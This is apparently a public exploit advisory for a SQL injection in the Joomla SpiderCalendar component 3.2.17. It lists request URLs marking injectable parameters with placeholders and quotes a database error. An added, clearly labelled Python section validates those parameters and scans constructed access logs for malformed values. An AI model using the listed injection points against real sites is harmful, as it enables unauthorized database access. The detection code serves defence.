####################################################################
# Exploit Title : Joomla SpiderCalendar Components 3.2.17 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 25/02/2019
# Vendor Homepage : web-dorado.com
# Software Download Link : web-dorado.com/products/joomla-calendar.html
# Software Information Link : extensions.joomla.org/extension/spider-calendar/
# Software Affected Versions : 3.2.6 and 3.2.17 / All Previous Versions
# Software Price Type : Paid Download ~ 20$ - 30$ - 40$
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description about Software :
***************************
Spider Calendar is one of the best event calendars available in JED. Spider Calendar is a
highly configurable responsive extension which allows you to have multiple organized
events in a calendar. If you have a problem with organizing your events and displaying
them in a calendar format, then Spider Calendar is the best solution.
####################################################################
# Impact :
***********
The Joomla SpiderCalendar 3.2.17 component [ and other versions ] is prone
to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
data before using it in an SQL query. Exploiting this issue could allow an attacker
to compromise the application, access or modify data, or exploit latent vulnerabilities
in the underlying database. A remote attacker can send a specially crafted request
to the vulnerable application and execute arbitrary SQL commands in the application's database.
Further exploitation of this vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser.
####################################################################
# SQL Injection Exploit :
**********************
/index.php?option=com_spidercalendar&calendar_id=[SQL Injection]
/index.php?option=com_spidercalendar&date=[SQL Injection]
/index.php?option=com_spidercalendar&view=bigcalendarweek&def_view=list&views=&rand=[ID-NUMBER]&theme_id=[ID-NUMBER]&calendar=[ID-NUMBER]&cat_id=&cat_ids=&format=row&tmpl=component&Itemid=[SQL Injection]
/index.php?option=com_spidercalendar&view=spidercalendarbig_seemore&theme_id=[ID-NUMBER]&ev_ids=&calendar_id=[ID-NUMBER]&date=[YEAR]-[MONTH]-[DAY]&cat_id=&cat_ids=[SQL Injection]&tmpl=component
/index.php?option=com_spidercalendar&view=spidercalendarbig&theme_id=[ID-NUMBER]&calendar_id=[ID-NUMBER]&eventID=[ID-NUMBER]&date=[YEAR]-[MONTH]-[DAY]&day=[ID-NUMBER]&ev_ids=[SQL Injection]&tmpl=component
/index.php?option=com_spidercalendar&view=bigcalendarweek&def_view=list&views=&rand=[ID-NUMBER]&theme_id=[ID-NUMBER]&calendar=[ID-NUMBER]&cat_id=&cat_ids=&format=row&tmpl=component&Itemid=[ID-NUMBER]&months=[YEAR]-[MONTH]-[DAY]&date=[YEAR]-[MONTH]-[DAY][SQL Injection]
####################################################################
# Example SQL Database Error :
****************************
1064 - You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near ')' at line 2 SQL=SELECT *
FROM fx5md_spidercalendar_event where calendar=1 AND id IN ()
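The error above shows the root cause from the defender's side: the component copies request values into an `IN ()` list without checking that they are integers. The following is an added example, not code from the advisory or from the Spider Calendar component. It defines the strict allow-list that each of the parameters named in the advisory should satisfy (integer ids, comma-separated integer lists, or `YYYY-MM-DD` dates; the shapes are inferred from the `[ID-NUMBER]` and `[YEAR]-[MONTH]-[DAY]` placeholders in the request list and are an assumption of this example) and runs that check over a few constructed Common Log Format lines to flag requests whose `com_spidercalendar` parameters are not well formed. The log lines, addresses and the `4)` value are constructed for illustration.

```python
"""Added example (not part of the advisory): allow-list validation of the
com_spidercalendar request parameters named above, applied to constructed
web-server log lines to surface malformed requests."""
import re
from urllib.parse import parse_qs, urlsplit

# The only shape each parameter should ever take. These rules are an
# assumption of this example, derived from the placeholders in the advisory.
INT_ONLY = re.compile(r"^\d+$")
INT_LIST = re.compile(r"^(\d+(,\d+)*)?$")      # empty list is allowed (advisory shows ev_ids=)
ISO_DATE = re.compile(r"^\d{4}-\d{2}-\d{2}$")

PARAM_RULES = {
    "calendar_id": INT_ONLY,
    "calendar": INT_ONLY,
    "theme_id": INT_ONLY,
    "eventID": INT_ONLY,
    "Itemid": INT_ONLY,
    "day": INT_ONLY,
    "cat_id": re.compile(r"^\d*$"),             # advisory shows cat_id= (blank) as normal
    "cat_ids": INT_LIST,
    "ev_ids": INT_LIST,
    "date": ISO_DATE,
    "months": ISO_DATE,
}


def validate_query(query: str) -> list:
    """Return (param, value) pairs in a com_spidercalendar query that break the allow-list.

    Requests for other components return an empty list: they are out of scope here.
    """
    qs = parse_qs(query, keep_blank_values=True)
    if qs.get("option") != ["com_spidercalendar"]:
        return []
    bad = []
    for name, rule in PARAM_RULES.items():
        for value in qs.get(name, []):
            if not rule.fullmatch(value):
                bad.append((name, value))
    return bad


# Common Log Format: the request line is quoted, e.g. "GET /path?q=1 HTTP/1.1".
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def scan_log(lines):
    """Yield (line_number, findings) for each line with a malformed spidercalendar parameter."""
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        findings = validate_query(urlsplit(m.group("target")).query)
        if findings:
            yield n, findings


# Constructed sample log lines (not taken from the advisory or any real server).
# Line 3 carries a stray ')' in ev_ids, the kind of value that produces the
# "near ')'" error quoted in the advisory; line 4 is another component entirely.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Feb/2019:10:00:01 +0000] "GET /index.php?option=com_spidercalendar&calendar_id=3 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [25/Feb/2019:10:00:02 +0000] "GET /index.php?option=com_spidercalendar&view=spidercalendarbig&theme_id=1&calendar_id=1&eventID=7&date=2019-02-25&day=25&ev_ids=4,5&tmpl=component HTTP/1.1" 200 3310',
    '10.0.0.9 - - [25/Feb/2019:10:00:03 +0000] "GET /index.php?option=com_spidercalendar&view=spidercalendarbig&theme_id=1&calendar_id=1&eventID=7&date=2019-02-25&day=25&ev_ids=4)&tmpl=component HTTP/1.1" 500 210',
    '10.0.0.9 - - [25/Feb/2019:10:00:04 +0000] "GET /index.php?option=com_content&view=article&id=1%27 HTTP/1.1" 200 800',
]

if __name__ == "__main__":
    for n, findings in scan_log(SAMPLE_LOG):
        print(f"line {n}: malformed parameters {findings}")
```

The same `PARAM_RULES` table is what a fixed component would apply before building the query: cast each id with an integer conversion, split list parameters on commas and cast every element, and reject anything else, so the `IN ()` list can never contain attacker-controlled text. Running the scan over real access logs gives a quick retrospective check for whether these parameters were ever hit with non-numeric values.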
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################